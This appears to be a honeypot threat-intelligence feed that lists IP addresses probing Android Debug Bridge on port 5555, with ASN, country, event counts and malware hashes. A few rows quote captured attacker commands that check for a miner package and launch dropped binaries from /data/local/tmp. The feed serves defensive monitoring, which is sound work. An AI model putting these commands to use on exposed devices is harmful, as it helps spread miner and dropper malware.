IPv4	142.93.209.213	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=IN; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-05T01:13:43.000Z \| last_seen=2026-04-05T01:38:38.027Z \| ports=5555 \| cc=IN \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	65.49.1.172	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-05T01:20:48.000Z \| last_seen=2026-04-28T14:03:32.634Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	65.49.1.176	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-05T01:19:18.000Z \| last_seen=2026-04-05T01:20:27.230Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	66.132.195.102	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-05T02:56:48.000Z \| last_seen=2026-04-05T02:58:05.495Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	45.142.193.164	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-05T03:23:11.000Z \| last_seen=2026-04-05T03:24:13.159Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	100.29.192.54	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14618; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-05T04:04:11.000Z \| last_seen=2026-04-05T04:05:51.326Z \| ports=5555 \| cc=US \| asn=14618 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	223.19.251.130	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=HK; asn=9304; asn_org=HGC Global Communications Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-05T04:12:03.000Z \| last_seen=2026-04-05T04:30:27.313Z \| ports=5555 \| cc=HK \| asn=9304 \| org=HGC Global Communications Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	44.220.188.91	Attacker IP • ADB / seen in ADBHoney; events=54; ports=5555; cc=US; asn=14618; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=54 \| first_seen=2026-04-05T04:14:33.000Z \| last_seen=2026-04-05T04:25:21.814Z \| ports=5555 \| cc=US \| asn=14618 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	85.11.183.21	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=GB; asn=201002; asn_org=PebbleHost Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=19 \| first_seen=2026-04-05T05:08:25.000Z \| last_seen=2026-04-05T05:19:12.545Z \| ports=5555 \| cc=GB \| asn=201002 \| org=PebbleHost Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	94.142.248.2	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=RU; asn=205784; asn_org=NV Telecom LLC; adb_cmd_hits=0; cmd="pm path com.ufo.miner" Observed in ADBHoney telemetry for 2026-04. events=19 \| first_seen=2026-04-05T05:34:20.000Z \| last_seen=2026-04-05T05:49:52.918Z \| ports=5555 \| cc=RU \| asn=205784 \| org=NV Telecom LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	216.180.246.85	Attacker IP • ADB / seen in ADBHoney; events=30; ports=5555; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=30 \| first_seen=2026-04-05T10:35:01.000Z \| last_seen=2026-04-05T10:50:47.687Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	87.121.125.71	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=KZ; asn=200590; asn_org=NLS Kazakhstan LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-05T10:33:15.000Z \| last_seen=2026-04-05T10:43:18.793Z \| ports=5555 \| cc=KZ \| asn=200590 \| org=NLS Kazakhstan LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	134.122.59.87	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=NL; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-05T12:32:26.000Z \| last_seen=2026-04-05T17:21:16.114Z \| ports=5555 \| cc=NL \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	221.127.189.183	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=HK; asn=9304; asn_org=HGC Global Communications Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-05T12:37:24.000Z \| last_seen=2026-04-05T12:39:00.052Z \| ports=5555 \| cc=HK \| asn=9304 \| org=HGC Global Communications Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	24.52.140.48	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=10971; asn_org=Cass Cable TV, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-05T14:50:28.000Z \| last_seen=2026-04-05T15:00:37.930Z \| ports=5555 \| cc=US \| asn=10971 \| org=Cass Cable TV, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	65.49.20.104	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=12 \| first_seen=2026-04-05T14:06:48.000Z \| last_seen=2026-04-27T03:02:29.131Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	65.49.20.68	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-05T14:07:45.000Z \| last_seen=2026-04-27T03:11:51.539Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	213.233.88.160	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RO; asn=12302; asn_org=Vodafone Romania S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-05T15:58:50.000Z \| last_seen=2026-04-05T16:09:01.500Z \| ports=5555 \| cc=RO \| asn=12302 \| org=Vodafone Romania S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	45.177.81.162	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=AR; asn=267897; asn_org=WABCOM S.A.S.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-05T15:37:10.000Z \| last_seen=2026-04-05T15:47:18.679Z \| ports=5555 \| cc=AR \| asn=267897 \| org=WABCOM S.A.S.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	45.205.1.8	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=215925; asn_org=Vpsvault.host Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4433 \| first_seen=2026-04-05T19:40:45.000Z \| last_seen=2026-04-30T22:44:15.994Z \| ports=5555 \| cc=US \| asn=215925 \| org=Vpsvault.host Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	102.209.18.156	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=KE; asn=329437; asn_org=Veenet-Africa; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-05T20:57:58.000Z \| last_seen=2026-04-05T21:08:03.847Z \| ports=5555 \| cc=KE \| asn=329437 \| org=Veenet-Africa	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	20.64.104.141	Attacker IP • ADB / seen in ADBHoney; events=27; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=27 \| first_seen=2026-04-05T22:00:25.000Z \| last_seen=2026-04-05T22:11:19.982Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	205.210.31.227	Attacker IP • ADB / seen in ADBHoney; events=21; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-05T23:49:57.000Z \| last_seen=2026-04-06T00:01:18.765Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	49.131.255.238	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=HK; asn=17924; asn_org=SmarTone Mobile Communications Ltd; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=3 \| first_seen=2026-04-05T23:56:39.000Z \| last_seen=2026-04-05T23:57:41.767Z \| ports=5555 \| cc=HK \| asn=17924 \| org=SmarTone Mobile Communications Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	117.68.74.161	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-06T03:31:02.000Z \| last_seen=2026-04-06T03:41:06.078Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	125.40.221.117	Attacker IP • ADB / seen in ADBHoney; events=56; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=27; cmd="/data/local/tmp/nohup /data/local/tmp/log" Observed in ADBHoney telemetry for 2026-04. events=59 \| first_seen=2026-04-06T03:53:07.000Z \| last_seen=2026-04-06T04:05:54.967Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone \| related_hashes=608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971,7a48c93c5cb63a09505a009260d1cca8203285e0c1c6ff5b0df9cbb470820865,d4e8c642ac8485d2ac316f16b5ed2285c93734c62a3e1bc2852a49f3737053c5,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-06
IPv4	185.224.128.16	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-06T03:38:57.000Z \| last_seen=2026-04-22T05:42:28.748Z \| ports=5555 \| cc=NL \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	201.138.194.78	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=MX; asn=8151; asn_org=UNINET; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T03:30:01.000Z \| last_seen=2026-04-06T03:40:10.323Z \| ports=5555 \| cc=MX \| asn=8151 \| org=UNINET	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	66.132.172.188	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-06T03:31:48.000Z \| last_seen=2026-04-06T03:33:07.303Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	115.23.104.56	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-06T04:08:04.000Z \| last_seen=2026-04-06T04:23:56.883Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	117.97.187.155	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=IN; asn=24560; asn_org=Bharti Airtel Ltd., Telemedia Services; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-06T05:30:10.000Z \| last_seen=2026-04-06T05:40:18.177Z \| ports=5555 \| cc=IN \| asn=24560 \| org=Bharti Airtel Ltd., Telemedia Services	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	154.124.204.218	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=SN; asn=8346; asn_org=SONATEL SONATEL-AS Autonomous System; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-06T05:39:05.000Z \| last_seen=2026-04-06T05:49:14.587Z \| ports=5555 \| cc=SN \| asn=8346 \| org=SONATEL SONATEL-AS Autonomous System	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	212.104.182.123	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=ES; asn=200845; asn_org=Avatel Telecom, SA; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T05:18:10.000Z \| last_seen=2026-04-06T05:28:18.638Z \| ports=5555 \| cc=ES \| asn=200845 \| org=Avatel Telecom, SA	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	128.79.205.187	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=FR; asn=5410; asn_org=Bouygues Telecom SA; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-06T06:16:23.000Z \| last_seen=2026-04-06T06:26:29.060Z \| ports=5555 \| cc=FR \| asn=5410 \| org=Bouygues Telecom SA	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	157.51.0.189	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=IN; asn=55836; asn_org=Reliance Jio Infocomm Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T06:53:59.000Z \| last_seen=2026-04-06T07:04:00.391Z \| ports=5555 \| cc=IN \| asn=55836 \| org=Reliance Jio Infocomm Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	181.191.118.172	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=BR; asn=267423; asn_org=NICFIBRA TELECOM; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-06T06:16:07.000Z \| last_seen=2026-04-06T06:26:14.099Z \| ports=5555 \| cc=BR \| asn=267423 \| org=NICFIBRA TELECOM	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	111.108.24.66	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=JP; asn=2516; asn_org=KDDI CORPORATION; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T07:00:26.000Z \| last_seen=2026-04-06T07:10:28.506Z \| ports=5555 \| cc=JP \| asn=2516 \| org=KDDI CORPORATION	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	179.49.156.114	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=PE; asn=270081; asn_org=VEMAX S.A.C; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T07:41:36.000Z \| last_seen=2026-04-06T07:51:40.796Z \| ports=5555 \| cc=PE \| asn=270081 \| org=VEMAX S.A.C	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	216.218.206.69	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T07:49:10.000Z \| last_seen=2026-04-06T07:59:18.645Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	216.218.206.85	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-06T07:47:56.000Z \| last_seen=2026-04-06T07:48:59.547Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	45.175.50.11	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=BR; asn=268884; asn_org=LIKEE FIBRA LTDA; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T07:47:47.000Z \| last_seen=2026-04-06T07:57:57.959Z \| ports=5555 \| cc=BR \| asn=268884 \| org=LIKEE FIBRA LTDA	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	183.232.212.194	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-06T08:58:09.000Z \| last_seen=2026-04-26T02:58:29.146Z \| ports=5555 \| cc=CN \| asn=9808 \| org=China Mobile Communications Group Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	73.134.102.82	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-06T08:44:18.000Z \| last_seen=2026-04-06T08:54:20.987Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	68.134.201.182	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=701; asn_org=Verizon Business; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T09:49:38.000Z \| last_seen=2026-04-06T09:59:46.312Z \| ports=5555 \| cc=US \| asn=701 \| org=Verizon Business	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	157.50.187.149	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=IN; asn=55836; asn_org=Reliance Jio Infocomm Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T10:29:05.000Z \| last_seen=2026-04-06T10:39:08.121Z \| ports=5555 \| cc=IN \| asn=55836 \| org=Reliance Jio Infocomm Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	194.187.178.18	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-06T10:05:06.000Z \| last_seen=2026-04-06T10:15:18.908Z \| ports=5555 \| cc=HK \| asn=215778 \| org=Alpha Strike Labs GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	194.187.178.185	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-06T10:05:06.000Z \| last_seen=2026-04-06T10:06:14.492Z \| ports=5555 \| cc=HK \| asn=215778 \| org=Alpha Strike Labs GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	212.145.61.61	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=ES; asn=12430; asn_org=Vodafone Spain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-06T10:22:31.000Z \| last_seen=2026-04-06T10:36:57.674Z \| ports=5555 \| cc=ES \| asn=12430 \| org=Vodafone Spain	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	83.111.102.110	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=AE; asn=5384; asn_org=Emirates Telecommunications Group Company (etisalat Group) Pjsc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T11:59:53.000Z \| last_seen=2026-04-06T12:09:58.229Z \| ports=5555 \| cc=AE \| asn=5384 \| org=Emirates Telecommunications Group Company (etisalat Group) Pjsc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	195.178.110.204	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=BG; asn=48090; asn_org=Techoff Srv Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=51 \| first_seen=2026-04-06T13:46:34.000Z \| last_seen=2026-04-18T07:54:24.039Z \| ports=5555 \| cc=BG \| asn=48090 \| org=Techoff Srv Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	1.24.16.104	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-06T14:28:26.000Z \| last_seen=2026-04-06T14:38:41.962Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	1.28.188.108	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=3 \| first_seen=2026-04-06T14:00:25.000Z \| last_seen=2026-04-06T14:01:29.487Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	1.85.217.186	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=12 \| first_seen=2026-04-06T14:27:30.000Z \| last_seen=2026-04-06T14:37:49.177Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	114.97.190.239	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-06T14:27:54.000Z \| last_seen=2026-04-06T14:38:12.102Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	114.97.191.82	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-06T14:28:02.000Z \| last_seen=2026-04-06T14:38:32.006Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	118.26.104.93	Attacker IP • ADB / seen in ADBHoney; events=112; ports=5555; cc=GB; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=112 \| first_seen=2026-04-06T14:12:05.000Z \| last_seen=2026-04-06T14:43:02.701Z \| ports=5555 \| cc=GB \| asn=135377 \| org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	144.123.78.112	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-06T14:28:11.000Z \| last_seen=2026-04-06T14:38:21.016Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	171.120.30.178	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-06T14:27:46.000Z \| last_seen=2026-04-06T14:38:04.099Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	171.8.138.219	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-06T14:27:22.000Z \| last_seen=2026-04-06T14:37:44.266Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	175.30.48.15	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-06T14:28:18.000Z \| last_seen=2026-04-06T14:38:33.956Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	218.205.95.161	Attacker IP • ADB / seen in ADBHoney; events=59; ports=5555; cc=CN; asn=56041; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=62 \| first_seen=2026-04-06T14:51:43.000Z \| last_seen=2026-04-06T15:04:26.612Z \| ports=5555 \| cc=CN \| asn=56041 \| org=China Mobile communications corporation \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-06
IPv4	220.197.78.19	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-06T14:27:20.000Z \| last_seen=2026-04-06T14:28:24.830Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	31.223.1.73	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=TR; asn=12735; asn_org=TurkNet Iletisim Hizmetleri A.S.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-06T14:36:26.000Z \| last_seen=2026-04-06T14:46:31.667Z \| ports=5555 \| cc=TR \| asn=12735 \| org=TurkNet Iletisim Hizmetleri A.S.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
